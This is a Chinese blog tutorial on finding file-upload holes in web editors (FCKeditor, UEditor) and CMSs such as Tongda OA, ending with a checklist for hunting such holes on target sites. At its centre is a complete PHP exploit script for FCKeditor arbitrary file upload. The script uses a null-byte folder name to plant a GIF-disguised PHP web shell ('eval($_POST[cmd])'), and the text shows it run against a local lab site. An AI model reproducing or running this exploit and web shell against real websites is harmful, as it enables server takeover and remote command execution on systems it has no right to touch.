编辑器文件上传简介及演示-CMS文件上传简介及演示-文件上传漏洞分析详细流程

向右看齐 2023-09-23 23:16 154阅读 0赞

# 一、编辑器文件上传简介 #

在某些网站里，可能会套用第三方的编辑器，来对图片、音频、文章等做相关处理，因此如果网站内有编辑器的话，编辑器的类型、版本也是我们进行渗透的一个点，大部分的编辑器漏洞都是文件上传漏洞。

# 二、fckeditor编辑器文件上传实例 #

1.  打开本地搭建的fckeditor编辑器站点（真正情况不是下面的样式）。

![b406655778bc4b76aa5a9af79dd89f5c.png][]

1.  正常情况下是类似下面的样式，如果在网上看到类似下面的页面，就说明这个网站是有编辑器的，但是其类型、版本可能不同。

![dffaea13eba24e578855a22704426e6b.png][]

1.  这个编辑器是UEditor，版本是1.4.3。

![90310d549cca4a8b9dfbe8c9d3a88fed.png][]

1.  是由百度开发出来的。

![6592fe26055f4e8e9b9512df325055f0.png][]

1.  通过搜索引擎在网上寻找此编辑器的漏洞，网上相关漏洞是有很多的。也就是说如果你能识别出对方网站所使用的编辑器，并且知道编辑器的路径地址，就可以根据编辑器的相应漏洞进行攻击。

![c52ed01d9c08498ba4c1b683d6e7df2c.png][]

1.  回到我们刚开始打开的fckeditor编辑器，那么可能会问，你是怎么知道是fckeditor编辑器的呢？可以根据网页的路径，或者扫到的相关的文件来进行判断。

![e628ae266df24f0c899b6bdcbe214303.png][]

![2ab4b5b8fa7f4fcd86ecb911d29207f4.png][]

1.  根据上图知道了此编辑器的名称以及版本，去搜索引擎去搜索相关漏洞。

![8a28368d95fe4dd2a4c71e8b1181acb1.png][]

1.  将网上搜索到的exp进行复制。

![0eebd4bddce54b6487e051103a4f247b.png][]

1.  在本地新建一个fck.php文件保存上面exp。

![bc58df1d0af248c4bb10a2b6b6ea213d.png][]

<?php
    error_reporting(0);
    set_time_limit(0);
    ini_set("default_socket_timeout", 5);
    define(STDIN, fopen("php://stdin", "r"));
    $match = array();
    function http_send($host, $packet)
    {
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
    print "\n[-] No response from {$host}:80 Trying again...";
    $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    print $resp;
    return $resp;
    }
    function connector_response($html)
    {
    global $match;
    return (preg_match("/OnUploadCompleted$(\d),\"(.*)\"$/", $html, $match) && in_array($match[1], array(0, 201)));
    }
    print "\n+------------------------------------------------------------------+";
    print "\n|         FCKEditor Servelet Arbitrary File Upload Exploit         |";
    print "\n+------------------------------------------------------------------+\n";
    if ($argc < 3)
    {
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /\n";
    print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
    die();
    }
    $host = $argv[1];
    $path = ereg_replace("(/){2,}", "/", $argv[2]);
    $filename = "fvck.gif";
    $foldername = "fuck.php%00.gif";
    $connector = "editor/filemanager/connectors/php/connector.php";
    $payload = "-----------------------------265001916915724\r\n";
    $payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[cmd]) ?>'."\n";
    $payload .= "-----------------------------265001916915724--\r\n";
    $packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    print $packet;
    if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
    else print "\n[-] Job done! try http://${host}/$match[2] \n";
    ?>

1.  将这个文件拖到php的安装目录里。

![a18708475a844d6d985ad41df104f407.png][]

1.  在当前目录创建一个cmd文件。

![2fed728acc434441bccec1fe677e84cc.png][]

1.  输入以下命令运行php文件。

![148ece42d2334568984185aed8109e39.png][]

1.  输入以下命令进行上传。

![343da789133c40b198211341916abb78.png][]

1.  上传完成，访问给出的路径即可。

![904925ddedc24a4a8e8f67321c86bdc8.png][]

1.  可以看到文件成功被上传上来了。

![01a8ea01a9124814964ec6efbb468b5d.png][]

# 三、如何判断使用的什么编辑器 #

1.  进入网站的会员中心或者后台中心可以看到其使用编辑器的情况。

1.  使用文件扫描，观察编辑器的相关路径。

1.  eg 1

![36caefa199544092b05c88b6b9771ed3.png][]

![f40d677cd5c64e88bb3b839c4e769211.png][]

![e194813c9f1c44f4913915882117e548.png][]

1.  eg 2

![63834aef4d28404ebe9fbb237b2c2476.png][]

![acc71c63c25941c79b5bc6535e50ebc4.png][]

1.  eg 3

![3bcbe6ea28eb488caf0809b6c05a354c.png][]

![50a14ab662de4124bd6a8fc6c4454cde.png][]

![6795034f58ce4157ba7302190587469b.png][]

![aa1dcc57cd6e40c482387318cbe7f3ad.png][]

![ee98e936cd9d4404987dbfcd1637c42e.png][]

# 四、CMS文件上传简介 #

在网上有很多网站开源原码（简称CMS）,CMS原码也可能会有相应的文件上传漏洞，只需要在网上查找相应漏洞，便可以进行突破。

# 五、通达OA系统文件上传实例 #

1.  对其进行配置。

![5478695057c749e6aaf41d6887202bdd.png][]

1.  配置完成后打开页面。

![b1df7cd30b9741f198f038b2393c7562.png][]

1.  正常看到这个界面后去搜索引擎内进行搜索。

![abe4f0f7a88d4132b53cc7e1e08d19ec.png][]

1.  打开网页后可以看到exp。

![cce7ab1a7ba34246ac6727ca6d05bdc0.png][]

# 六、文件上传漏洞分析流程 #

**在拿到一个网站后，如果单纯想从文件上传方面分析漏洞，流程如下所示。**

1.  **首先要看中间件，确定其是否存在解析漏洞。**

1.  **确定存在漏洞后，接下来就要寻找文件上传点了。**

1.  **可以通过字典扫面，也可以通过会员中心等位置。**

1.  **如果没有解析漏洞的话，就可以进行对文件上传方面检测的分析和绕过了。**

1.  **此时就要判断对方是黑名单还是白名单还是基于内容的验证了。**

1.  **确定之后就可以按照对应方法进行绕过了。**

1.  **如果在这方面依然没办法进行绕过，就可以考虑网站的CMS了，因为CMS也可能会爆出一些网站的漏洞。**

1.  **如果CMS方面也没有漏洞，就可以在网站上寻找有没有编辑器了。**

1.  **可以通过字典扫描，或者查看网站的会员中心或者后台来看到编辑器的类型以及版本。**

1.  **得到编辑器的信息之后，就可以到搜索引擎内搜索相关漏洞了。**

1.  **如果这方面依然不行，就可以查看CVE编号漏洞了，看网上最近有没有爆出相关的CVE编号漏洞。**

1.  **如果上面所有方面均测试完成了还没有找到漏洞，那么大概率就是不存在文件上传漏洞了。**

[b406655778bc4b76aa5a9af79dd89f5c.png]: https://img-blog.csdnimg.cn/img_convert/b406655778bc4b76aa5a9af79dd89f5c.png
[dffaea13eba24e578855a22704426e6b.png]: https://img-blog.csdnimg.cn/img_convert/dffaea13eba24e578855a22704426e6b.png
[90310d549cca4a8b9dfbe8c9d3a88fed.png]: https://img-blog.csdnimg.cn/img_convert/90310d549cca4a8b9dfbe8c9d3a88fed.png
[6592fe26055f4e8e9b9512df325055f0.png]: https://img-blog.csdnimg.cn/img_convert/6592fe26055f4e8e9b9512df325055f0.png
[c52ed01d9c08498ba4c1b683d6e7df2c.png]: https://img-blog.csdnimg.cn/img_convert/c52ed01d9c08498ba4c1b683d6e7df2c.png
[e628ae266df24f0c899b6bdcbe214303.png]: https://img-blog.csdnimg.cn/img_convert/e628ae266df24f0c899b6bdcbe214303.png
[2ab4b5b8fa7f4fcd86ecb911d29207f4.png]: https://img-blog.csdnimg.cn/img_convert/2ab4b5b8fa7f4fcd86ecb911d29207f4.png
[8a28368d95fe4dd2a4c71e8b1181acb1.png]: https://img-blog.csdnimg.cn/img_convert/8a28368d95fe4dd2a4c71e8b1181acb1.png
[0eebd4bddce54b6487e051103a4f247b.png]: https://img-blog.csdnimg.cn/img_convert/0eebd4bddce54b6487e051103a4f247b.png
[bc58df1d0af248c4bb10a2b6b6ea213d.png]: https://img-blog.csdnimg.cn/img_convert/bc58df1d0af248c4bb10a2b6b6ea213d.png
[a18708475a844d6d985ad41df104f407.png]: https://img-blog.csdnimg.cn/img_convert/a18708475a844d6d985ad41df104f407.png
[2fed728acc434441bccec1fe677e84cc.png]: https://img-blog.csdnimg.cn/img_convert/2fed728acc434441bccec1fe677e84cc.png
[148ece42d2334568984185aed8109e39.png]: https://img-blog.csdnimg.cn/img_convert/148ece42d2334568984185aed8109e39.png
[343da789133c40b198211341916abb78.png]: https://img-blog.csdnimg.cn/img_convert/343da789133c40b198211341916abb78.png
[904925ddedc24a4a8e8f67321c86bdc8.png]: https://img-blog.csdnimg.cn/img_convert/904925ddedc24a4a8e8f67321c86bdc8.png
[01a8ea01a9124814964ec6efbb468b5d.png]: https://img-blog.csdnimg.cn/img_convert/01a8ea01a9124814964ec6efbb468b5d.png
[36caefa199544092b05c88b6b9771ed3.png]: https://img-blog.csdnimg.cn/img_convert/36caefa199544092b05c88b6b9771ed3.png
[f40d677cd5c64e88bb3b839c4e769211.png]: https://img-blog.csdnimg.cn/img_convert/f40d677cd5c64e88bb3b839c4e769211.png
[e194813c9f1c44f4913915882117e548.png]: https://img-blog.csdnimg.cn/img_convert/e194813c9f1c44f4913915882117e548.png
[63834aef4d28404ebe9fbb237b2c2476.png]: https://img-blog.csdnimg.cn/img_convert/63834aef4d28404ebe9fbb237b2c2476.png
[acc71c63c25941c79b5bc6535e50ebc4.png]: https://img-blog.csdnimg.cn/img_convert/acc71c63c25941c79b5bc6535e50ebc4.png
[3bcbe6ea28eb488caf0809b6c05a354c.png]: https://img-blog.csdnimg.cn/img_convert/3bcbe6ea28eb488caf0809b6c05a354c.png
[50a14ab662de4124bd6a8fc6c4454cde.png]: https://img-blog.csdnimg.cn/img_convert/50a14ab662de4124bd6a8fc6c4454cde.png
[6795034f58ce4157ba7302190587469b.png]: https://img-blog.csdnimg.cn/img_convert/6795034f58ce4157ba7302190587469b.png
[aa1dcc57cd6e40c482387318cbe7f3ad.png]: https://img-blog.csdnimg.cn/img_convert/aa1dcc57cd6e40c482387318cbe7f3ad.png
[ee98e936cd9d4404987dbfcd1637c42e.png]: https://img-blog.csdnimg.cn/img_convert/ee98e936cd9d4404987dbfcd1637c42e.png
[5478695057c749e6aaf41d6887202bdd.png]: https://img-blog.csdnimg.cn/img_convert/5478695057c749e6aaf41d6887202bdd.png
[b1df7cd30b9741f198f038b2393c7562.png]: https://img-blog.csdnimg.cn/img_convert/b1df7cd30b9741f198f038b2393c7562.png
[abe4f0f7a88d4132b53cc7e1e08d19ec.png]: https://img-blog.csdnimg.cn/img_convert/abe4f0f7a88d4132b53cc7e1e08d19ec.png
[cce7ab1a7ba34246ac6727ca6d05bdc0.png]: https://img-blog.csdnimg.cn/img_convert/cce7ab1a7ba34246ac6727ca6d05bdc0.png